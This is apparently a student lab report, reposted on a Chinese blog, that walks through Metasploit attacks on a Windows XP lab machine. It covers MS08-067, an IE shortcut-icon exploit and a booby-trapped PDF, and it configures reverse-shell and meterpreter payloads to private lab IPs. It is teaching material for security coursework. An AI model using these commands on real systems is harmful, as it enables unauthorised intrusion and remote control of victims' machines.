Exp5 MSF基礎(chǔ)應(yīng)用

一個(gè)主動(dòng)攻擊實(shí)踐，MS08-067

• 首先利用msfconsole啟用msf終端

• 然后利用search MS08-067搜索漏洞，會(huì)顯示相應(yīng)漏洞模塊

如圖：

• 根據(jù)上圖，我們輸入use exploit/windows/smb/ms08_067_netapi，選擇相應(yīng)的模塊

• 然后我們可以使用show payloads，查看可以使用的模塊

如圖：

• 然后根據(jù)上圖，為獲取靶機(jī)的shell，所以利用set payload generic/shell_reverse_tcp

• 然后輸入show options，查看配置信息，知道我們需要配置RHOST，LHOST，LPORT，target
  如圖：
  

• 輸入

set RHOST 192.168.241.138 set LHOST 192.168.241.134 set LPORT 5210

進(jìn)行配置

• 然后我們?cè)俅卫胹how options，查看配置信息
  如圖：
  

• 然后exploit進(jìn)行監(jiān)聽

如圖：

• 如果出現(xiàn)如下情況，關(guān)閉防火墻，就可以解決
  

針對(duì)瀏覽器的攻擊，ms10_046

• 起初我打算做ms11_050，攻擊IE瀏覽器，但是IE8.0版本，不能成功，可能是IE8.0已經(jīng)修復(fù)相關(guān)漏洞了。

• 所以我選擇了ms10_046，首先輸入search ms10_046查找漏洞

如圖：

• 由于我們要對(duì)瀏覽器進(jìn)行攻擊，所以我們輸入use use exploit/windows/browser/ms10_046_shortcut_icon_

• 然后我們輸入show payloads，查看載荷進(jìn)行選擇，這里我仍用實(shí)驗(yàn)一中的載荷set payload generic/shell_reverse_tcp

如圖：

• 我們利用show options查詢需要配置的有，LPORT，LHOST，SRVHOST

• 輸入

set SRVHOST 192.168.241.134 set LHOST 192.168.241.134 set LPORT 5210

進(jìn)行配置

• 再次查看配置信息

如圖：

• 然后輸入exploit生成URL

如圖：

• 在windows端訪問該URL，kali端如圖：
  

• 輸入sessions，可看到一個(gè)ID為1的連接
  如圖：
  

• 然后輸入session -i 1，接入ID為1的連接，輸入shell，獲取成功。
  如圖：
  

針對(duì)客戶端的攻擊

• 首先還是先利用search adobe進(jìn)行搜索
  如圖：
  

• 然后進(jìn)行選擇，我選擇的是use windows/fileformat/adobe_flashplayer_button
  

• 然后set payload windows/meterpreter/reverse_tcp，設(shè)置所用荷載，利用show options查看所要配置的信息
  如圖：
  

• 輸入如下代碼，對(duì)LHOST，LPORT，FILENAME進(jìn)行配置

set LHOST 192.168.241.134 set LPORT 5210 set FILENAME 20155210.pdf

• 輸入exploit，生成20155210.pdf文件
  如圖：
  

• 輸入use exploit/multi/handler，進(jìn)入監(jiān)聽，并設(shè)置監(jiān)聽端口，主機(jī)號(hào)

• 在windows端，打開20155210.pdf，成功回連
  如圖：
  

輔助模塊應(yīng)用

• 首先利用show auxiliary，查看輔助模塊

• 我選擇的是scanner/dns/dns_amp，掃描dns

• 輸入show options，查看配置
  

• 輸入exploit進(jìn)行監(jiān)聽
  

基礎(chǔ)問題

• 用自己的話解釋什么是exploit,payload,encode

• exploit：針對(duì)靶機(jī)的漏洞，利用靶機(jī)中的后門，對(duì)靶機(jī)進(jìn)行攻擊

• payload：相當(dāng)于shellcode前身，也就是后門的模板

• encode：對(duì)payload進(jìn)行編碼

實(shí)驗(yàn)體會(huì)

我們應(yīng)該盡可能的，去更新最新版的軟件和系統(tǒng)，否則就會(huì)給黑客可乘之機(jī)。

比如，我們做的實(shí)驗(yàn)都是基于xp系統(tǒng)的，但是如果對(duì)win7、8、10，進(jìn)行攻擊則無效。

比如，我在做實(shí)驗(yàn)2時(shí)，想做老師給的例子，但是那個(gè)漏洞對(duì)IE8.0不好使。

我們沒有一個(gè)可以針對(duì)現(xiàn)用系統(tǒng)或者軟件的滲透攻擊庫，離實(shí)戰(zhàn)還是很遠(yuǎn)的

轉(zhuǎn)載于:https://www.cnblogs.com/panyinghao/p/8921439.html

總結(jié)

以上是生活随笔為你收集整理的20155210 Exp5 MSF基础应用的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。